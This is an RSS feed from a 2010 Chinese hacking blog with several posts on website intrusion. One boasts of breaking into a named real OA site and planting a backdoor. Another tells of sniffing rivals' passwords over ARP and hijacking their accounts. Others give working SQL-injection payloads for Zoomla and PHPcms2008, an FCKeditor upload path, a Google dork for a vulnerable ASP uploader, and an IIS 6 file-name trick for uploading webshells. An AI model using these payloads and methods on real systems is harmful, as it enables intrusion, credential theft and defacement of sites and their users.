<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<?xml-stylesheet type="text/xsl" href="css/rss.xslt"?>
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:trackback="http://madskills.com/public/xml/rss/module/trackback/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/"><channel><title>神刀网</title><link>http://www.nhs8.com/</link><description>简者为王 技术为先 开源创意 专注android开发 ORACLE数据库SQL使用 关注开源技术 网络渗透安全 SEO网赚！</description><generator>RainbowSoft Studio Z-Blog 1.8 Walle Build 91204</generator><language>zh-CN</language><copyright>Copyright http://www.nhs8.com 神刀网 Some Rights Reserved.粤ICP备06083217号     var locationUrl = escape(document.location.href);     document.write(unescape(&amp;quot;%3Cscript&amp;quot;)+&amp;quot; charset='utf-8' src='http://union.rising.com.cn//InfoManage/TrojanInspect.aspx?p1=p11PRuO8WSiXwiGwHEu8uOp44NnQK2m5&amp;amp;p2=XwiJxWzSSIA=&amp;amp;p3=p11PRuO8WShSETV7Gpj84Q==&amp;amp;url=&amp;quot;+ locationUrl  + &amp;quot;' type='text/javascript'&amp;quot;+unescape(&amp;quot;%3E%3C/script%3E&amp;quot;));&amp;lt;</copyright><pubDate>Wed, 10 Mar 2010 16:20:13 +0800</pubDate><item><title>检测OA时代</title><author>ni10256@163.com (神刀)</author><link>http://www.nhs8.com/post/1595.html</link><pubDate>Wed, 10 Mar 2010 16:13:06 +0800</pubDate><guid>http://www.nhs8.com/post/1595.html</guid><description><![CDATA[<p><a href="http://www.oatime.com/">http://www.oatime.com/</a>&nbsp; OA时代 PR4</p>
<p>网站为DEDECMS 5.5 拿了最近的洞生成t.php，一句话连上，丢了大马上去</p>
<p>ws可用，3389可连，跨目录查看</p>
<p>看到360提权卫士，直接提了，远连，到手！</p>
<p><img title="" alt="" src="http://www.nhs8.com/upload/201003101617516756.jpg" onload="ResizeImage(this,520)" /></p>
<p>丢后门，留底！</p><p>Copyright © 神刀网 http://www.nhs8.com/</p><p><a href="http://www.nhs8.com/post/1595.html" target="_blank">继续阅读《检测OA时代》的全文内容...</a></p><p>分类: <a href="http://www.nhs8.com/catalog.asp?cate=24">网络安全与维护</a> | Tags: <a href="http://www.nhs8.com/catalog.asp?tags=%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E4%B8%8E%E7%BB%B4%E6%8A%A4">网络安全与维护</a>&nbsp;&nbsp; | <a href="http://www.nhs8.com/post/1595.html#comment" target="_blank">添加评论</a>(0)</p><h3>相关文章:</h3><ul><p><a  href="http://www.nhs8.com/post/1594.html">回忆社工小武&helen</a>&nbsp;&nbsp;(2010-3-10 16:3:37)</p><p><a  href="http://www.nhs8.com/post/1593.html">Zoomla!逐浪CMS3.2 0day</a>&nbsp;&nbsp;(2010-3-10 15:19:33)</p><p><a  href="http://www.nhs8.com/post/1592.html">PHPcms2008 0day</a>&nbsp;&nbsp;(2010-3-10 15:12:45)</p><p><a  href="http://www.nhs8.com/post/1591.html">某教育培训网ODAY</a>&nbsp;&nbsp;(2010-3-10 15:11:14)</p><p><a  href="http://www.nhs8.com/post/1590.html">上传漏洞 hidden to text 突破手记</a>&nbsp;&nbsp;(2010-3-9 23:46:11)</p></ul>版权所有 神刀网 http://www.nhs8.com/ Q：46007728]]></description><category>网络安全与维护</category><comments>http://www.nhs8.com/post/1595.html#comment</comments><wfw:comment>http://www.nhs8.com/</wfw:comment><wfw:commentRss>http://www.nhs8.com/feed.asp?cmt=1595</wfw:commentRss><trackback:ping>http://www.nhs8.com/cmd.asp?act=tb&amp;id=1595&amp;key=74812776</trackback:ping></item><item><title>回忆社工小武&amp;amp;helen</title><author>ni10256@163.com (神刀)</author><link>http://www.nhs8.com/post/1594.html</link><pubDate>Wed, 10 Mar 2010 16:03:37 +0800</pubDate><guid>http://www.nhs8.com/post/1594.html</guid><description><![CDATA[<p>这是我在华夏黑客联盟转载的，静流--------华夏黑客联盟的讲师，其BLOG被Helen入侵了，Helen在其博客上改了首页<br />
<span id="attach_2299" onmouseover="showMenu({'ctrlid':this.id,'pos':'13'})" style="display: none; position: absolute"><img src="http://www.nhs8.com/upload/201003101603574678.gif" border="0" alt="" /></span> <img id="aimg_2299" alt="1.jpg" src="http://www.nhs8.com/upload/201003101603572606.jpg" width="526" unselectable="true" outfunc="null" initialized="true" status="2" file="attachments/month_1001/1001221718646cabc2c9cd1894.jpg" /></p>
<div class="t_attach" id="aimg_2299_menu" style="display: none; z-index: 301; filter: progid:DXImageTransform.Microsoft.Alpha(opacity=100); left: 327px; position: absolute; top: 439px; opacity: 1" cache="1" initialized="true" fade="false" cover="0" layer="1" mtype="menu" ctrlkey="aimg_2299"><a title="1.jpg" onclick="javascript: dps_attachad(this, event);" href="http://www.sinhack.com/attachment.php?aid=MjI5OXw2MDMxYzdkOHwxMjY4MjA4MDQwfDMyODFsZ0gxNlRJa3cxaGRhanhQVmI3UTRqTE5ZenkzSUh1YS81SVJNa0lqODJj&amp;nothumb=yes" target="_blank"><strong>下载</strong></a> (316.47 KB)<br />
<div class="t_smallfont">2010-1-22 17:18</div>
</div>
<p><br />
<br />
-----------------------------------------------------------------------------------------------------------------------------<br />
<br />
下面是静流自己的讲述：<br />
事出起因：helen太喜欢装B，拿小武入侵我BLOG的权限来改首页装B。其实我也好久没管BLOG了，BLOG空间玉米都我徒弟的，我只是挂名的，他们居然那么二，拿来装。<br />
<br />
现在我们简单说下过程了，很多地方就不截图了，我跟小M发现HELEN跟小武都在邪十，于是我们就想从邪十入手。<br />
<br />
拿C段其中一个服务器，服务器很BT，装了SU，但是终端连接不上，只能用LCX，<br />
<span id="attach_2300" onmouseover="showMenu({'ctrlid':this.id,'pos':'13'})" style="display: none; position: absolute"><img src="http://www.nhs8.com/upload/201003101603574678.gif" border="0" alt="" /></span> <img id="aimg_2300" alt="2.jpg" src="http://www.nhs8.com/upload/201003101603584733.jpg" width="543" unselectable="true" outfunc="null" initialized="true" status="2" file="attachments/month_1001/100122171882745711bd443197.jpg" /></p>
<div class="t_attach" id="aimg_2300_menu" style="display: none; z-index: 301; filter: progid:DXImageTransform.Microsoft.Alpha(opacity=100); left: 327px; position: absolute; top: 819px; opacity: 1" cache="1" initialized="true" fade="false" cover="0" layer="1" mtype="menu" ctrlkey="aimg_2300"><a title="2.jpg" onclick="javascript: dps_attachad(this, event);" href="http://www.sinhack.com/attachment.php?aid=MjMwMHxhYzJjY2IyMXwxMjY4MjA4MDQwfDMyODFsZ0gxNlRJa3cxaGRhanhQVmI3UTRqTE5ZenkzSUh1YS81SVJNa0lqODJj&amp;nothumb=yes" target="_blank"><strong>下载</strong></a> (79.39 KB)<br />
<div class="t_smallfont">2010-1-22 17:18</div>
</div>
<p><br />
然后就是拿CAIN进行ARP嗅了，嗅到了小武跟HELEN的密码<br />
<br />
<span id="attach_2301" onmouseover="showMenu({'ctrlid':this.id,'pos':'13'})" style="display: none; position: absolute"><img src="http://www.nhs8.com/upload/201003101603574678.gif" border="0" alt="" /></span> <img id="aimg_2301" alt="3.jpg" src="http://www.nhs8.com/upload/201003101603595347.jpg" width="315" unselectable="true" outfunc="null" initialized="true" status="2" file="attachments/month_1001/1001221718b985bc3f27f3c7b6.jpg" /></p>
<div class="t_attach" id="aimg_2301_menu" style="display: none; z-index: 301; filter: progid:DXImageTransform.Microsoft.Alpha(opacity=100); left: 327px; position: absolute; top: 1303px; opacity: 1" cache="1" initialized="true" fade="false" cover="0" layer="1" mtype="menu" ctrlkey="aimg_2301"><a title="3.jpg" onclick="javascript: dps_attachad(this, event);" href="http://www.sinhack.com/attachment.php?aid=MjMwMXw0MmFlMGYzOHwxMjY4MjA4MDQwfDMyODFsZ0gxNlRJa3cxaGRhanhQVmI3UTRqTE5ZenkzSUh1YS81SVJNa0lqODJj&amp;nothumb=yes" target="_blank"><strong>下载</strong></a> (241.22 KB)<br />
<div class="t_smallfont">2010-1-22 17:18</div>
</div>
<p><br />
<br />
还有邪十<span class="t_tag" onclick="tagshow(event)" href="tag.php?name=%B9%DC%C0%ED">管理</span>的密码，只是PHPWIND7.5还不知道怎么<span class="t_tag" onclick="tagshow(event)" href="tag.php?name=%BA%F3%CC%A8">后台</span>拿SHELL，<br />
<br />
然后就是拿这些密码把小武的BLOG跟HELEN的QQ社了，HELEN还自称多NB，其实也就那样<br />
<span id="attach_2302" onmouseover="showMenu({'ctrlid':this.id,'pos':'13'})" style="display: none; position: absolute"><img src="http://www.nhs8.com/upload/201003101603574678.gif" border="0" alt="" /></span> <img class="zoom" id="aimg_2302" onclick="zoom(this, this.src)" alt="4.jpg" src="http://www.nhs8.com/upload/201003101604005201.jpg" width="600" unselectable="true" outfunc="null" initialized="true" status="2" file="attachments/month_1001/1001221718ad0c1acce83fe81c.jpg" /></p>
<div class="t_attach" id="aimg_2302_menu" style="display: none; z-index: 301; filter: progid:DXImageTransform.Microsoft.Alpha(opacity=100); left: 327px; position: absolute; top: 1581px; opacity: 1" cache="1" initialized="true" fade="false" cover="0" layer="1" mtype="menu" ctrlkey="aimg_2302"><a title="4.jpg" onclick="javascript: dps_attachad(this, event);" href="http://www.sinhack.com/attachment.php?aid=MjMwMnxkYzc3OTFkM3wxMjY4MjA4MDQwfDMyODFsZ0gxNlRJa3cxaGRhanhQVmI3UTRqTE5ZenkzSUh1YS81SVJNa0lqODJj&amp;nothumb=yes" target="_blank"><strong>下载</strong></a> (80.21 KB)<br />
<div class="t_smallfont">2010-1-22 17:18</div>
</div>
<p><br />
<br />
引用某淫<span class="t_tag" onclick="tagshow(event)" href="tag.php?name=%D2%BB%BE%E4%BB%B0">一句话</span>：他们就是一群SB，拿一个SHELL，每个人装一次B。</p><p>Copyright © 神刀网 http://www.nhs8.com/</p><p><a href="http://www.nhs8.com/post/1594.html" target="_blank">继续阅读《回忆社工小武&helen》的全文内容...</a></p><p>分类: <a href="http://www.nhs8.com/catalog.asp?cate=24">网络安全与维护</a> | Tags: <a href="http://www.nhs8.com/catalog.asp?tags=%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E4%B8%8E%E7%BB%B4%E6%8A%A4">网络安全与维护</a>&nbsp;&nbsp; | <a href="http://www.nhs8.com/post/1594.html#comment" target="_blank">添加评论</a>(0)</p><h3>相关文章:</h3><ul><p><a  href="http://www.nhs8.com/post/1595.html">检测OA时代</a>&nbsp;&nbsp;(2010-3-10 16:13:6)</p><p><a  href="http://www.nhs8.com/post/1593.html">Zoomla!逐浪CMS3.2 0day</a>&nbsp;&nbsp;(2010-3-10 15:19:33)</p><p><a  href="http://www.nhs8.com/post/1592.html">PHPcms2008 0day</a>&nbsp;&nbsp;(2010-3-10 15:12:45)</p><p><a  href="http://www.nhs8.com/post/1591.html">某教育培训网ODAY</a>&nbsp;&nbsp;(2010-3-10 15:11:14)</p><p><a  href="http://www.nhs8.com/post/1590.html">上传漏洞 hidden to text 突破手记</a>&nbsp;&nbsp;(2010-3-9 23:46:11)</p></ul>版权所有 神刀网 http://www.nhs8.com/ Q：46007728]]></description><category>网络安全与维护</category><comments>http://www.nhs8.com/post/1594.html#comment</comments><wfw:comment>http://www.nhs8.com/</wfw:comment><wfw:commentRss>http://www.nhs8.com/feed.asp?cmt=1594</wfw:commentRss><trackback:ping>http://www.nhs8.com/cmd.asp?act=tb&amp;id=1594&amp;key=ff4b98e5</trackback:ping></item><item><title>Zoomla!逐浪CMS3.2 0day</title><author>ni10256@163.com (神刀)</author><link>http://www.nhs8.com/post/1593.html</link><pubDate>Wed, 10 Mar 2010 15:19:33 +0800</pubDate><guid>http://www.nhs8.com/post/1593.html</guid><description><![CDATA[<p>北洋贱队（http://bbs.seceye.org）首发 Blog:www.dongxie.org 测试版本： Zoomla!逐浪CMS3.2 + mssql for Windows 描述： Zoomla!逐浪CMS是功能强大的网站内核与管理系统,集成内容管理OASNS项目管理采集邮件订阅等强大功能,基于c#语言.net架构 开发,是目前中国唯一同步支持MSSQL与Oracle两大数据库的高端CMS,用于快速构建高效门户网站 测试方法： &mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&ndash; 警 告以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！ 1.注入漏洞： http://www.site.com/Search/SearchList.aspx?node=0&amp;keyword=1%25&prime;%20Or%20Db_NaMe()=0%20oR%20&prime;%25&prime;=&rsquo;&amp;type=1 2.FCKeditor上传漏洞 http://www.site.com/editor/filemanager/browser/default/browser.html?Type=Image&amp;Connector=http%3A%2F%2Fwww.site.com%2Feditor%2Ffilemanager%2Fconnectors%2Faspx%2Fconnector.aspx 3.XSS脚本跨站漏洞 http://www.site.com/prompt/correct.aspx?t= 目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本： <a href="http://www.zoomla.cn/">http://www.zoomla.cn/</a></p><p>Copyright © 神刀网 http://www.nhs8.com/</p><p><a href="http://www.nhs8.com/post/1593.html" target="_blank">继续阅读《Zoomla!逐浪CMS3.2 0day》的全文内容...</a></p><p>分类: <a href="http://www.nhs8.com/catalog.asp?cate=24">网络安全与维护</a> | Tags: <a href="http://www.nhs8.com/catalog.asp?tags=%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E4%B8%8E%E7%BB%B4%E6%8A%A4">网络安全与维护</a>&nbsp;&nbsp; | <a href="http://www.nhs8.com/post/1593.html#comment" target="_blank">添加评论</a>(0)</p><h3>相关文章:</h3><ul><p><a  href="http://www.nhs8.com/post/1595.html">检测OA时代</a>&nbsp;&nbsp;(2010-3-10 16:13:6)</p><p><a  href="http://www.nhs8.com/post/1594.html">回忆社工小武&helen</a>&nbsp;&nbsp;(2010-3-10 16:3:37)</p><p><a  href="http://www.nhs8.com/post/1592.html">PHPcms2008 0day</a>&nbsp;&nbsp;(2010-3-10 15:12:45)</p><p><a  href="http://www.nhs8.com/post/1591.html">某教育培训网ODAY</a>&nbsp;&nbsp;(2010-3-10 15:11:14)</p><p><a  href="http://www.nhs8.com/post/1590.html">上传漏洞 hidden to text 突破手记</a>&nbsp;&nbsp;(2010-3-9 23:46:11)</p></ul>版权所有 神刀网 http://www.nhs8.com/ Q：46007728]]></description><category>网络安全与维护</category><comments>http://www.nhs8.com/post/1593.html#comment</comments><wfw:comment>http://www.nhs8.com/</wfw:comment><wfw:commentRss>http://www.nhs8.com/feed.asp?cmt=1593</wfw:commentRss><trackback:ping>http://www.nhs8.com/cmd.asp?act=tb&amp;id=1593&amp;key=7d135667</trackback:ping></item><item><title>PHPcms2008 0day</title><author>ni10256@163.com (神刀)</author><link>http://www.nhs8.com/post/1592.html</link><pubDate>Wed, 10 Mar 2010 15:12:45 +0800</pubDate><guid>http://www.nhs8.com/post/1592.html</guid><description><![CDATA[<p>Exploit：</p>
<p>&nbsp;</p>
<p>/ask/search_ajax.php?q=s%D5'%20or%20(select%20ascii(substring(password,1,1))%20from%20phpcms_member%20where%20username=0x706870636D73)&gt;52%23</p><p>Copyright © 神刀网 http://www.nhs8.com/</p><p><a href="http://www.nhs8.com/post/1592.html" target="_blank">继续阅读《PHPcms2008 0day》的全文内容...</a></p><p>分类: <a href="http://www.nhs8.com/catalog.asp?cate=24">网络安全与维护</a> | Tags: <a href="http://www.nhs8.com/catalog.asp?tags=%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E4%B8%8E%E7%BB%B4%E6%8A%A4">网络安全与维护</a>&nbsp;&nbsp; | <a href="http://www.nhs8.com/post/1592.html#comment" target="_blank">添加评论</a>(0)</p><h3>相关文章:</h3><ul><p><a  href="http://www.nhs8.com/post/1595.html">检测OA时代</a>&nbsp;&nbsp;(2010-3-10 16:13:6)</p><p><a  href="http://www.nhs8.com/post/1594.html">回忆社工小武&helen</a>&nbsp;&nbsp;(2010-3-10 16:3:37)</p><p><a  href="http://www.nhs8.com/post/1593.html">Zoomla!逐浪CMS3.2 0day</a>&nbsp;&nbsp;(2010-3-10 15:19:33)</p><p><a  href="http://www.nhs8.com/post/1591.html">某教育培训网ODAY</a>&nbsp;&nbsp;(2010-3-10 15:11:14)</p><p><a  href="http://www.nhs8.com/post/1590.html">上传漏洞 hidden to text 突破手记</a>&nbsp;&nbsp;(2010-3-9 23:46:11)</p></ul>版权所有 神刀网 http://www.nhs8.com/ Q：46007728]]></description><category>网络安全与维护</category><comments>http://www.nhs8.com/post/1592.html#comment</comments><wfw:comment>http://www.nhs8.com/</wfw:comment><wfw:commentRss>http://www.nhs8.com/feed.asp?cmt=1592</wfw:commentRss><trackback:ping>http://www.nhs8.com/cmd.asp?act=tb&amp;id=1592&amp;key=6b2e9910</trackback:ping></item><item><title>某教育培训网ODAY</title><author>ni10256@163.com (神刀)</author><link>http://www.nhs8.com/post/1591.html</link><pubDate>Wed, 10 Mar 2010 15:11:14 +0800</pubDate><guid>http://www.nhs8.com/post/1591.html</guid><description><![CDATA[<div class="cnt" id="blog_text">
<p><font color="#3d85c6">By无晴</font></p>
<p><br />
<font color="#3d85c6">出错代码：</font></p>
<p><font color="#3d85c6">&lt;!--#include FILE=&quot;upload.inc&quot;--&gt;<br />
&lt;%<br />
dim upload,file,formName,formPath,iCount,fileformat<br />
set upload=new upload_F<br />
function MakedownName()<br />
dim fname<br />
&nbsp;&nbsp;&nbsp; fname = now()<br />
fname = replace(fname,&quot;-&quot;,&quot;&quot;)<br />
&nbsp;&nbsp; fname = replace(fname,&quot; &quot;,&quot;&quot;) <br />
fname = replace(fname,&quot;:&quot;,&quot;&quot;)<br />
&nbsp;&nbsp;&nbsp; fname = replace(fname,&quot;PM&quot;,&quot;&quot;)<br />
&nbsp;&nbsp;&nbsp; fname = replace(fname,&quot;AM&quot;,&quot;&quot;)<br />
fname = replace(fname,&quot;上午&quot;,&quot;&quot;)<br />
&nbsp;&nbsp;&nbsp; fname = replace(fname,&quot;下午&quot;,&quot;&quot;)<br />
&nbsp;&nbsp;&nbsp; fname = int(fname) + int((10-1+1)*Rnd + 1)<br />
MakedownName=fname<br />
end function <br />
formPath=&quot;upload/&quot;<br />
iCount=0<br />
for each formName in upload.file ''列出所有上传了的文件<br />
set file=upload.file(formName) ''生成一个文件对象</font></p>
<p><font color="#3d85c6">fileformat=lcase(right(file.filename,4))<br />
if file.FileSize&gt;2000000 then <br />
response.write&quot;&lt;script&gt;alert('太大');location='&quot;&amp;request.ServerVariables(&quot;HTTP_REFERER&quot;)&amp;&quot;'&lt;/script&gt;&quot;<br />
response.end<br />
elseif fileformat=&quot;.asp&quot; or fileformat=&quot;.exe&quot; or fileformat=&quot;.txt&quot; or fileformat=&quot;.htm&quot; then<br />
response.write&quot;&lt;script&gt;alert('文件格式不对，请重新上传！');location='&quot;&amp;request.ServerVariables(&quot;HTTP_REFERER&quot;)&amp;&quot;'&lt;/script&gt;&quot;<br />
response.end<br />
end if </font></p>
<p><font color="#3d85c6">if file.FileSize&gt;0 then&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ''如果 FileSize &gt; 0 说明有文件数据<br />
newname=MakedownName()&amp;&quot;.&quot;&amp;mid(file.FileName,InStrRev(file.FileName, &quot;.&quot;)+1)</font></p>
<p><font color="#3d85c6">file.SaveAs Server.mappath(formPath&amp;newname)&nbsp;&nbsp; ''保存文件<br />
iCount=iCount+1<br />
else <br />
response.write &quot;未找到文件 &amp;nbsp;&amp;nbsp;&lt;A HREF=<em>javascript</em>:history.back(1)&gt;返回&lt;/A&gt;&quot;<br />
response.end<br />
end if<br />
next<br />
%&gt;<br />
&lt;html&gt;<br />
&lt;head&gt;<br />
&lt;title&gt;&lt;/title&gt;<br />
&lt;meta http-equiv=&quot;Content-Type&quot; content=&quot;text/html; charset=gb2312&quot;&gt;<br />
&lt;link rel=&quot;stylesheet&quot; href=&quot;css.css&quot; type=&quot;text/css&quot;&gt;<br />
&lt;/head&gt;</font></p>
<p><font color="#3d85c6">&lt;body leftmargin=&quot;0&quot; topmargin=&quot;0&quot; marginwidth=&quot;0&quot; marginheight=&quot;0&quot;&gt;</font></p>
<p><br />
<font color="#3d85c6">&lt;p&gt;<br />
&lt;% response.write newname%&gt;<br />
&lt;/p&gt;</font></p>
<p><font color="#3d85c6">&lt;/body&gt;<br />
&lt;/html&gt;&lt;script language = &quot;JavaScript&quot;&gt;</font></p>
<p><font color="#3d85c6">window.opener.form1.img1.src = '/user/hy_images/upload/'+'&lt;% response.write newname%&gt;';<br />
window.opener.form1.tp.value = '&lt;% response.write newname%&gt;';<br />
window.close();<br />
&lt;/Script&gt;</font></p>
<p><font color="#3d85c6">很简单的的过滤，而且上传不会被改名<br />
----------------------------------------------------------------------------------------------------------------------<br />
利用</font></p>
<p><font color="#3d85c6">关键词 Geogle：inurl:geren_add.asp</font></p>
<p><font color="#3d85c6">上传页面user/hy_images/upload.htm</font></p>
<p>&nbsp;</p>
<p><br />
<font color="#3d85c6">上传asa ，cer ，aspx，php 的马</font></p>
<p><font color="#3d85c6">木马目录： </font><a href="http://www.52hacker.cn/user/hy_images/upload/"><font color="#3d85c6">http://www.52hacker.cn/user/hy_images/upload/</font></a><font color="#3d85c6">马的名字</font></p>
<p><font color="#3d85c6">这样就ok了。。<br />
</font></p>
</div><p>Copyright © 神刀网 http://www.nhs8.com/</p><p><a href="http://www.nhs8.com/post/1591.html" target="_blank">继续阅读《某教育培训网ODAY》的全文内容...</a></p><p>分类: <a href="http://www.nhs8.com/catalog.asp?cate=24">网络安全与维护</a> | Tags: <a href="http://www.nhs8.com/catalog.asp?tags=%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E4%B8%8E%E7%BB%B4%E6%8A%A4">网络安全与维护</a>&nbsp;&nbsp; | <a href="http://www.nhs8.com/post/1591.html#comment" target="_blank">添加评论</a>(0)</p><h3>相关文章:</h3><ul><p><a  href="http://www.nhs8.com/post/1595.html">检测OA时代</a>&nbsp;&nbsp;(2010-3-10 16:13:6)</p><p><a  href="http://www.nhs8.com/post/1594.html">回忆社工小武&helen</a>&nbsp;&nbsp;(2010-3-10 16:3:37)</p><p><a  href="http://www.nhs8.com/post/1593.html">Zoomla!逐浪CMS3.2 0day</a>&nbsp;&nbsp;(2010-3-10 15:19:33)</p><p><a  href="http://www.nhs8.com/post/1592.html">PHPcms2008 0day</a>&nbsp;&nbsp;(2010-3-10 15:12:45)</p><p><a  href="http://www.nhs8.com/post/1590.html">上传漏洞 hidden to text 突破手记</a>&nbsp;&nbsp;(2010-3-9 23:46:11)</p></ul>版权所有 神刀网 http://www.nhs8.com/ Q：46007728]]></description><category>网络安全与维护</category><comments>http://www.nhs8.com/post/1591.html#comment</comments><wfw:comment>http://www.nhs8.com/</wfw:comment><wfw:commentRss>http://www.nhs8.com/feed.asp?cmt=1591</wfw:commentRss><trackback:ping>http://www.nhs8.com/cmd.asp?act=tb&amp;id=1591&amp;key=25509d12</trackback:ping></item><item><title>上传漏洞 hidden to text 突破手记</title><author>ni10256@163.com (神刀)</author><link>http://www.nhs8.com/post/1590.html</link><pubDate>Tue, 09 Mar 2010 23:46:11 +0800</pubDate><guid>http://www.nhs8.com/post/1590.html</guid><description><![CDATA[<p>文章作者:udb311</p>
<p>本文是由一个上传的页面突破上传引发的，话说当时群里议论纷纷。发出XXX网站的上传地址，研究过来研究过去。没找到突破，本地修改上传提交仍然不能突破。&nbsp;</p>
<p>就在当时，小三毛同志提出修改hidden to text利用IIS漏洞可取webshell。咱也试下这招数如何</p>
<p>本地构造上传&nbsp;</p>
<p>&lt;!DOCTYPE HTML PUBLIC &quot;-//W3C//DTD HTML 4.01 Transitional//EN&quot;&gt;<br />
&nbsp;&lt;html&gt;<br />
&nbsp;&lt;head&gt;<br />
&nbsp;&lt;meta http-equiv=&quot;Content-Type&quot; content=&quot;text/html; charset=gb2312&quot;&gt;<br />
&nbsp;&lt;LINK href=&quot;../css/css.css&quot; rel=stylesheet type=text/css&gt;<br />
&nbsp;&lt;title&gt;上传图片&lt;/title&gt;<br />
&nbsp;&lt;/head&gt;<br />
&nbsp;<br />
&nbsp;&lt;body leftmargin=&quot;0&quot; topmargin=&quot;0&quot;&gt;<br />
&nbsp;&lt;table width=&quot;100%&quot; border=&quot;0&quot; cellspacing=&quot;0&quot; cellpadding=&quot;0&quot;&gt;<br />
&nbsp; &lt;tr&gt;<br />
&nbsp; &lt;td height=&quot;20&quot; align=&quot;center&quot;&gt; <br />
&nbsp;<br />
&nbsp; &lt;/td&gt;<br />
&nbsp; &lt;/tr&gt;<br />
&nbsp;&lt;/table&gt;<br />
&nbsp;&lt;table width=&quot;90%&quot; border=&quot;0&quot; align=&quot;center&quot; cellpadding=&quot;1&quot; cellspacing=&quot;1&quot; bgcolor=&quot;#999999&quot;&gt;<br />
&nbsp; &lt;form action=&quot;<a href="http://xxx.net/inn/upfilesave.asp">http://xxx.net/inn/upfilesave.asp</a>&quot; method=&quot;post&quot; enctype=&quot;multipart/form-data&quot;&gt;<br />
&nbsp;<br />
&nbsp; &lt;tr&gt; <br />
&nbsp; &lt;td bgcolor=&quot;#FFFFFF&quot;&gt;&lt;table width=&quot;100%&quot; border=&quot;0&quot; cellspacing=&quot;0&quot; cellpadding=&quot;0&quot;&gt;<br />
&nbsp; &lt;tr&gt;<br />
&nbsp; &lt;td height=&quot;25&quot; bgcolor=&quot;#CCCCCC&quot; class=&quot;td_14&quot;&gt;上传图片&lt;/td&gt;<br />
&nbsp; &lt;/tr&gt;<br />
&nbsp; &lt;/table&gt;&lt;/td&gt;<br />
&nbsp; &lt;/tr&gt; <br />
&nbsp; &lt;tr&gt;<br />
&nbsp; &lt;td height=&quot;35&quot; align=&quot;center&quot; bgcolor=&quot;#FFFFFF&quot;&gt; <br />
&nbsp; &lt;input name=&quot;image&quot; type=&quot;file&quot; id=&quot;image&quot;&gt;<br />
&nbsp; &lt;/td&gt;<br />
&nbsp; &lt;/tr&gt;<br />
&nbsp; &lt;tr&gt;<br />
&nbsp; &lt;td height=&quot;35&quot; align=&quot;center&quot; bgcolor=&quot;#FFFFFF&quot;&gt; <br />
&nbsp; &lt;input type=&quot;submit&quot; name=&quot;Submit&quot; value=&quot;提交&quot; onClick=&quot;checkImage('image')&quot;&gt;<br />
&nbsp; &lt;input name=&quot;PathFolder&quot; type=&quot;hidden&quot; id=&quot;PathFolder&quot; value=&quot;/img/trade/&quot;&gt;<br />
&nbsp; &lt;input name=&quot;FormName&quot; type=&quot;hidden&quot; id=&quot;FormName&quot; value=&quot;add&quot;&gt; <br />
&nbsp; &lt;input name=&quot;parent&quot; type=&quot;hidden&quot; id=&quot;parent&quot; value=&quot;img&quot;&gt;<br />
&nbsp; &lt;input name=&quot;Filename_Pre&quot; type=&quot;text&quot; id=&quot;Filename_Pre&quot; value=&quot;&quot;&gt; <br />
&nbsp; &lt;input name=&quot;Create&quot; type=&quot;hidden&quot; id=&quot;Create&quot; value=&quot;&quot;&gt;<br />
&nbsp; &lt;input type=&quot;reset&quot; name=&quot;Submit2&quot; value=&quot;关闭&quot; onClick=&quot;javascript:window.close()&quot;&gt;<br />
&nbsp; &lt;/td&gt;<br />
&nbsp; &lt;/tr&gt;<br />
&nbsp; &lt;/form&gt;<br />
&nbsp;&lt;/table&gt;<br />
&nbsp;&lt;/body&gt;<br />
&nbsp;&lt;/html&gt;<br />
&nbsp;&lt;script language=javascript&gt;<br />
&nbsp;function checkImage(sId)<br />
&nbsp;{<br />
&nbsp; if(( document.all[sId].value.indexOf(&quot;.asp&quot;) == -1) &amp;&amp; (document.all[sId].value.indexOf(&quot;.asa&quot;) == -1)) {<br />
&nbsp; //alert(&quot;请选择gif或jpg的图象文件&quot;);<br />
&nbsp; // event.returnValue = false;<br />
&nbsp; }<br />
&nbsp;}<br />
&nbsp;&lt;/script&gt; 保存为HTML。。。</p>
<p>原来</p>
<p>&lt;input name=&quot;Filename_Pre&quot; type=&quot;hidden&quot; id=&quot;Filename_Pre&quot; value=&quot;&quot;&gt;&nbsp;&nbsp;</p>
<p>修改</p>
<p><font color="#ff0000">&lt;input name=&quot;Filename_Pre&quot; type=&quot;text&quot; id=&quot;Filename_Pre&quot; value=&quot;&quot;&gt;</font>&nbsp;</p>
<p>打开本地HTML提交页，上传时填充1.asp;。&nbsp;</p>
<p>成功返回1.asp;_201036165716.jpg。IIS 6.0，成功运行小马~</p><p>Copyright © 神刀网 http://www.nhs8.com/</p><p><a href="http://www.nhs8.com/post/1590.html" target="_blank">继续阅读《上传漏洞 hidden to text 突破手记》的全文内容...</a></p><p>分类: <a href="http://www.nhs8.com/catalog.asp?cate=24">网络安全与维护</a> | Tags: <a href="http://www.nhs8.com/catalog.asp?tags=%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E4%B8%8E%E7%BB%B4%E6%8A%A4">网络安全与维护</a>&nbsp;&nbsp; | <a href="http://www.nhs8.com/post/1590.html#comment" target="_blank">添加评论</a>(0)</p><h3>相关文章:</h3><ul><p><a  href="http://www.nhs8.com/post/1595.html">检测OA时代</a>&nbsp;&nbsp;(2010-3-10 16:13:6)</p><p><a  href="http://www.nhs8.com/post/1594.html">回忆社工小武&helen</a>&nbsp;&nbsp;(2010-3-10 16:3:37)</p><p><a  href="http://www.nhs8.com/post/1593.html">Zoomla!逐浪CMS3.2 0day</a>&nbsp;&nbsp;(2010-3-10 15:19:33)</p><p><a  href="http://www.nhs8.com/post/1592.html">PHPcms2008 0day</a>&nbsp;&nbsp;(2010-3-10 15:12:45)</p><p><a  